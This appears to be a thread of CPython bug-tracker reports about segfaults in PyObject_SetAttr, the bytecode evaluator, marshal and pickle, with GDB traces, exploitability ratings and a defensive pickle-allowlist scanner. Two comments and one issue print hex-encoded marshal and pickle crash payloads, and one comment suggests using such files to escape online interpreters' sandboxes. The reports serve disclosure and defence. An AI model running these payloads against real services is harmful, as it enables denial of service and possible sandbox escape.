[issue41168] Lack of proper checking in PyObject_SetAttr leads to segmentation fault
New submission from Iman Sharafodin:

I was testing the latest release of Python 3.6 (June 27, 2020) (https://www.python.org/ftp/python/3.6.11/Python-3.6.11.tgz) and I found that there is a lack of enough checks on line 956 of the Objects/object.c file, which can cause a segmentation fault. It could lead to security-related issues. I've attached the PoC.pyc.

Program received signal SIGSEGV, Segmentation fault.
PyObject_SetAttr (v=v@entry=0x6d7373616c637463, name=0x77f75730, value=value@entry=0x0) at Objects/object.c:956
956         PyTypeObject *tp = Py_TYPE(v);

--
components: Interpreter Core
files: PoC.pyc
messages: 372683
nosy: Iman Sharafodin
priority: normal
severity: normal
status: open
title: Lack of proper checking in PyObject_SetAttr leads to segmentation fault
type: security
versions: Python 3.6
Added file: https://bugs.python.org/file49280/PoC.pyc

___
Python tracker <https://bugs.python.org/issue41168>
___
___
Python-bugs-list mailing list
Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
New submission from Iman Sharafodin:

Python 3.6 (June 27, 2020) (https://www.python.org/ftp/python/3.6.11/Python-3.6.11.tgz). I found an exploitable segmentation fault in Python 3.6.11 (I validated that by using GDB's Exploitable plugin). Please find the attachment.

#0  0x00b63bf4 in _PyEval_EvalFrameDefault (f=, throwflag=) at Python/ceval.c:3667
#1  0x00b5bc5b in PyEval_EvalFrameEx (throwflag=0, f=0x77f66c50) at Python/ceval.c:754
#2  _PyEval_EvalCodeWithName (_co=_co@entry=0x77ef5030, globals=globals@entry=0x77f62168, locals=locals@entry=0x77f62168, args=args@entry=0x0, argcount=argcount@entry=0, kwnames=kwnames@entry=0x0, kwargs=0x0, kwcount=0, kwstep=2, defs=0x0, defcount=0, kwdefs=0x0, closure=0x0, name=0x0, qualname=0x0) at Python/ceval.c:4166
#3  0x00b6100b in PyEval_EvalCodeEx (closure=0x0, kwdefs=0x0, defcount=0, defs=0x0, kwcount=0, kws=0x0, argcount=0, args=0x0, locals=locals@entry=0x77f62168, globals=globals@entry=0x77f62168, _co=_co@entry=0x77ef5030) at Python/ceval.c:4187
#4  PyEval_EvalCode (co=co@entry=0x77ef5030, globals=globals@entry=0x77f62168, locals=locals@entry=0x77f62168) at Python/ceval.c:731

--
files: ExploitableCrash.pyc
messages: 372776
nosy: Iman Sharafodin
priority: normal
severity: normal
status: open
title: An exploitable segmentation fault in _PyEval_EvalFrameDefault
versions: Python 3.6
Added file: https://bugs.python.org/file49285/ExploitableCrash.pyc
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment:

I created a Python file with 12 lines of code and then changed the bytecode to make Python crash (I was testing Python to find security-related bugs). I can send the original file; do you need that?
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment:

It could be potentially dangerous. For example, some services might use Python Core to decompile pyc files and they could be hacked, or some other services could run restricted pyc files for users, but using this bug they can escape the sandbox and run the malicious code.
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment:

You're right. But if someone uses the exact same code to decompile a pyc to Python code, the attacker doesn't have access to the interpreter and cannot even run the pyc file on the server, but the attacker can cause a crash and run the malicious exploit code. Anyway, my only goal was to help the Python community (which I love) to improve the code quality. Have a nice day.
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment:

Thank you for the response.
[issue41208] An exploitable segmentation fault in marshal module
New submission from Iman Sharafodin:

It seems that all versions of Python 3 are vulnerable to de-marshaling the attached file (the Python file is included). I've tested on Python 3.10.0a0 (heads/master:b40e434, Jul 4 2020), Python 3.6.11 and Python 3.7.2. This is due to a lack of proper validation at Objects/tupleobject.c:413 (heads/master:b40e434).

This is the result of GDB's Exploitable plugin (it's exploitable):

Description: Access violation during branch instruction
Short description: BranchAv (4/22)
Hash: e04b830dfb409a8bbf67bff96ff0df44.4d31b48b56e0c02ed51520182d91a457
Exploitability Classification: EXPLOITABLE
Explanation: The target crashed on a branch instruction, which may indicate that the control flow is tainted.
Other tags: AccessViolation (21/22)

--
components: Interpreter Core
files: Crash.zip
messages: 372990
nosy: Iman Sharafodin
priority: normal
severity: normal
status: open
title: An exploitable segmentation fault in marshal module
type: security
versions: Python 3.10
Added file: https://bugs.python.org/file49295/Crash.zip
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

What about patching that as a crash?
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

By using our proprietary fuzzer. I'm a cybersecurity researcher.
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

I thought it's like Pickle. Then if we find an exploitable segfault just in Pickle, would you count it as a threat?
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

It's interesting that you would not count a critical segfault in Pickle as a threat, because there are numerous libraries that are unpickling untrusted user data (even though some of them are using RestrictedUnpickler to protect themselves, a segfault would bypass that). For example, the Ray project with five thousand commits (https://github.com/ray-project/ray/blob/master/rllib/utils/policy_server.py#L31). Long story short, you advise us not to put time into checking the security of the Pickle module too, am I right?

Thanks,
Iman
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

Sure. Thank you.
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

Nevertheless, I have an exploitable crash for the Pickle module too right now, but as you're not interested, I didn't open an issue to share it. Thanks anyway.
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

There are many online Python interpreters; we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as they fully trust that Python doesn't generate a segfault. For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though they have protection mechanisms for file access and many other things.

---
https://www.programiz.com/python-programming/online-compiler/
---
import io
import marshal

hex_string = "FBE90100DA0136E90209720100720300DA0168A903720100720500DA026161DA026A6A7BDA0278785B0200720100DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
---
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

@serhiy.storchaka you name it, you have it. The following code generates a segfault in the Pickle module [it's a crafted datetime object] (Python 3.10.0a0 (heads/master:b40e434, Jul 4 2020), Python 3.6.11 and Python 3.7.2):

import io
import pickle

hex_string = "8004952A008C086461746574696D65948C086461746574696D65949388430A07B2010192059452942E"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = pickle.load(f)
print(data)
print('We have segfault but we cannot see!')
[issue41288] Pickle crashes using a crafted datetime object
New submission from Iman Sharafodin:

The following code generates a segfault in the Pickle module [it's a crafted datetime object] (Python 3.10.0a0 (heads/master:b40e434, Jul 4 2020), Python 3.6.11 and Python 3.7.2):

import io
import pickle

hex_string = "8004952A008C086461746574696D65948C086461746574696D65949388430A07B2010192059452942E"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = pickle.load(f)
print(data)
print('We have segfault but we cannot see!')

--
components: Interpreter Core
messages: 373573
nosy: Iman Sharafodin
priority: normal
severity: normal
status: open
title: Pickle crashes using a crafted datetime object
type: crash
versions: Python 3.10
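A defensive counterpart to the crafted-datetime report above and to the RestrictedUnpickler remark in issue41208, added here as an example and not code from CPython or from the reporter: it walks a pickle stream with pickletools.genops and lists every GLOBAL / STACK_GLOBAL reference before anything is constructed, then refuses to unpickle unless all of them are on an allowlist (the function names and the constructed sample pickles are my own). The crashing pickle reaches datetime.datetime through exactly such a reference, so an allowlist is only as strong as the validation done by each constructor it admits; it narrows the surface but does not make unpickling untrusted bytes safe.

```python
import collections
import datetime
import pickle
import pickletools

# Opcodes that push a str on the stack (what STACK_GLOBAL pops as its operands).
_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "SHORT_BINSTRING", "BINSTRING", "STRING"}
# Opcodes that neither push nor pop a value; skipped when looking back.
_NEUTRAL_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT", "FRAME", "PROTO"}

def referenced_globals(data: bytes) -> list:
    """List the (module, name) pairs the stream would import via find_class.
    pickletools reports GLOBAL's operands as one "module name" string, while
    STACK_GLOBAL (protocol 4+) pops the two strings pushed just before it; if
    those are not literal strings the scan fails closed instead of guessing.
    """
    found, recent = [], []  # recent: last two value-producing opcodes seen
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(recent) < 2 or any(n not in _STRING_OPS for n, _ in recent):
                raise ValueError("STACK_GLOBAL operands are not literal strings")
            found.append((recent[0][1], recent[1][1]))
        if op.name not in _NEUTRAL_OPS:
            recent = (recent + [(op.name, arg)])[-2:]
    return found

def safe_loads(data: bytes, allowed=frozenset()):
    """Unpickle only if every global the stream references is allowlisted."""
    for module, name in referenced_globals(data):
        if (module, name) not in allowed:
            raise pickle.UnpicklingError(f"refusing global {module}.{name}")
    return pickle.loads(data)

def is_rejected(data: bytes, allowed=frozenset()) -> bool:
    """True when safe_loads refuses the stream (unresolvable or disallowed global)."""
    try:
        safe_loads(data, allowed)
    except (pickle.UnpicklingError, ValueError):
        return True
    return False

# Constructed samples (not the thread's payload): a plain dict; a genuine datetime
# pickle (STACK_GLOBAL, protocol 4); an OrderedDict pickle (GLOBAL, protocol 2).
SAFE_SAMPLE = pickle.dumps({"a": 1}, protocol=4)
DATETIME_P4 = pickle.dumps(datetime.datetime(2020, 7, 4), protocol=4)
ORDERED_P2 = pickle.dumps(collections.OrderedDict(), protocol=2)
```

Running the scan with an empty allowlist rejects both class-bearing samples while the plain dict loads; admitting ("datetime", "datetime") lets the genuine datetime through, which is the point at which a malformed state blob would still reach the constructor.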
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:

@serhiy.storchaka Thank you. Please find it here: https://bugs.python.org/issue41288.